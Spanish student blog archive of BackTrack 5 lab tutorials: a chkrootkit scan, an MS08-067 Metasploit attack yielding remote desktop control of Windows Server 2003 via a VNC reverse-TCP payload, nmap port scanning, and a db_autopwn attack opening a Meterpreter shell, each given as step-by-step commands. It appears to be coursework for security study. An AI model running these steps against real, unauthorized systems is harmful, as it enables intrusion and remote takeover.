Archive for mayo, 2012


ROOTKIT CON BACKTRACK 5

Hoy vamos a  mostrar  rootkits  para comprobar su disco duro (hd) .

Es bastante simple y muy rápido.  Así que vamos a empezar

Ingresamos desde nuestra maquina virtual a backtrack 5.

Luego colocamos los comandos q podemos ver en pantalla.

"PARTE 2"

Es más fácil escribirCd/pentest/torensics/chkrookit

"PARTE 4"

Entonces todo lo que tiene que escribir es / chkrootkit, más las opciones que desee, pero esto sólo para una búsqueda de virus.

Ahora bien, como se puede ver que es muy rápido y fácil de comprobar
Esto es útil para la digitalización de HD ‘s (discos duros) o en cuanto al funcionamiento y la necesidad de revisar el servidor /ordenador, etc
Con esto concluimos, gracias… 🙂

"PARTE 5"

INTEGRANTES

  1. VIVIANA OCAÑA
  2. GLORIA SALAZAR
  3. ROBERT SALINAS

Introducción:

Es un tipo de ataque de autentificación remota, lo que significa que permite conectarnos remotamente a algún equipo sin tener los permisos necesarios, esto claro si el sistema operativo posee aquellas vulnerabilidades, como por ejemplo sistemas Windows desactualizados.

Objetivo:

Violar la seguridad de un Sistema Windows conectándonos remotamente a este sin tener los permisos necesarios. Para nuestro ejemplo sera un Windows Server 2003, en ejercicios de pruebas también pudimos atacar de la misma manera a Windows XP.

Herramientas a utilizar:

-BackTrack

-Windows Server 2003

Configuraciones de los equipos:

(Estas direcciones han sido utilizadas para nuestro ejemplo, lo importante para el ataque es que las maquinas se encuentren conectadas en la misma red)

– BackTrack

IP: 192.168.1.5

– Windows Server 2003

IP: 192.168.1.6

Revisión de las configuraciones antes de realizar el ataque:

Nos aseguramos de comprobar las Ips de nuestros equipos.

En BackTrack para conocer nuestra Ip abrimos un terminal y usamos el comando ifconfig

En Windows para conocer nuestra Ip abrimos una consola de cmd y usamos el comando ipconfig

Para verificar que hay conexión entre ambos equipos procedemos a realizar un ping, tanto como desde backtrack a windows como de windows a bactrack.

Para casos ya reales en los que no siempre tendremos acceso a la ip de nuestra victima podemos usar el comando nmap en backtrack, permitiendonos asi explorar la red, ver las maquinas conectadas, sus ips y que sistemas operativos poseen.

Procedimiento para realizar el ataque:

Ya previas revisiones de las direcciones y teniendo en claro lo que vamos a realizar, procedemos a seguir los siguientes pasos:

1) Abrimos un terminal desde BackTrack y usamos el comando msfconsole (este comando abre la interfaz MSF -> Metasploit Framework) y esperamos a que cargue la pantalla de bienvenida a la interfaz.

2) Usamos el comando show exploits (nos muestra las lista de los tipos de ataque disponibles), el comando es simplemente utilizado para recordar que tipo de ataque era el que vamos a usar. Ya que en nuestro caso el tipo de ataque es: windows/smb/ms08_067_netapi

Este paso puede ser omitido si se tiene claro que el tipo de ataque es: windows/smb/ms08_067_netapi

3) Usamos el comando use <tipo_de_ataque>

En nuestro caso seria:  use windows/smb/ms08_067_netapi 

4) Procedemos a setear (configuramos los parametros necesarios para realizar el ataque).

4.1) Seteamos el RHOST (Remote Host, que viene a ser la ip de nuestra victima).

El comando a utilizar es set RHOST <ip_victima>

Para nuestro ejemplo seria set RHOST 192.168.1.6

4.2) Seteamos el LHOST (Local Host, que viene a ser la ip de donde estamos realizando el ataque).

El comando a utilizar es set LHOST <ip_atacante>

Para nuestro ejemplo seria set LHOST 192.168.1.5

4.3) Mostramos los payloads (son los métodos del tipo de ataque seleccionado). Esto lo hacemos si no tenemos claro que payload setear. Pero para nuestro ejemplo sabemos que es: windows/vncinject/reverse_tcp

Entonces procedemos a usar el comando: set payload <metodo_ataque>

Para nuestro ejemplo seria: set payload windows/vncinject/reverse_tcp

5) Una vez configurados los parametros, procedemos a ejecutar el ataque con el comando: exploit

6) Finalmente se abre una interfaz donde podemos ver el escritorio de nuestra victima, hemos tomado el control mediante acceso remoto.

Recomendaciones:

Se recomienda tener todos los parches instalados de Windows XP, o de cualquier Sistema Operativo, así se disminuyen las vulnerabilidades.

Se recomienda actualizar constantemente el Sistema Operativo, para disminuir la vulnerabilidades del mismo.

Se recomienda usar software legal, si las licencias son muy caras, siempre se puede optar por el software libre.

Integrantes:

  • Anthony Filian Vivanco
  • Paul Padilla Sabando
  • Josue Cevallos Bayas
  • Christian Chamba Mendez

Port Scanning

Integrantes:

Alicia Nuñez

Johnny Barbech

Ernesto Alcívar

Port Scanning es un método que me permite hacer una búsqueda de puertos abiertos en un host o en una red, ya sea que estén trebajando con protocolo TCP o UDP.

Lo que necesitamos para poder realizar el port scanning es la herramienta Bactrack y acceso a la red.

A continuación detallamos las opciones que me da el comando NMap para realizar la búsqueda.

1.- La opción más básica es la busqueda de puertos en un host como se ve en la figura, que nos devuelve la siguiente información:

# de puerto/Protocolo

Estado

Servicio que lo está utilizando

2.- El segundo método es el que se conoce como una búsqueda exaustiva. En este comando le vamos a indicar que busque los puertos del 1 al 65535 en el host especificado

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3.- Otro forma de búsqueda es un escaneo de toda la red y obteniendo la información del sistema operativo que corre en las distintas màquinas. En este caso nos dice que el sistema opertivo que está corriendo  ese host puede ser ·Windows 7″

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

4.- Estas son unas de las opciones que nos ofrece el Nmap para realizar búsqueda de puertos. En el video se muestra la forma de realizar los mismos tipos de búsqueda pero con  una herrmanienta más sencilla y con entorno gráfico como es el Zenmap.

Gracias… Dejen sus comentarios

 

 

INTEGRANTES
Viviana Ocaña
Gloria Salazar
Robert Salinas

ataque autoPWN

El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:

apt-get install postgresql libpq-dev

el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql.

Al finalizar la instalación conectamos con el postgresql y cambiamos el password

sudo su postgres -c psql

Aquí pones el password nuevo.

ALTER USER postgres WITH PASSWORD ‘password’ ;
después \q
sudo passwd -d postgres

sudo su postgres -c passwd con este se cambia el password

Esto es para conectarse del ruby al postgresql.

gem install pg

Ahora llamamos a metasploit

msfconsole
db_driver postgresql

y para conectar con la base de datos

db_connect postgres:”password”@127.0.0.1/metasploitdb

El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar
a la base de datos.

Ahora utilizamos nmap para ver las vulnerabilidades de la víctima.

db_nmap 192.168.1.10<——– el numero ip de la víctima  DB_NMAP es usado apartir de back track5 en adelante de xp sp 1.

Nmap escaneo los puertos e identifico el sistema operativo de la víctima.
Ahora procedemos con el ataque.

db_hosts
db_autopwn -t -p -e

AL terminar el autopwn muestra las posibles sesiones.
Para entrar a una de ellas

sessions -i 1 el numero es la sesión que fue elegida.

Aquí se puede ver como entra al shell de windows desde meterpreter.

Integrantes

  • Ronald Lloacana
  • Leandro Lopez
  • Fabian Zambrano

VIDEO DE ATAQUE DE AUTOPWN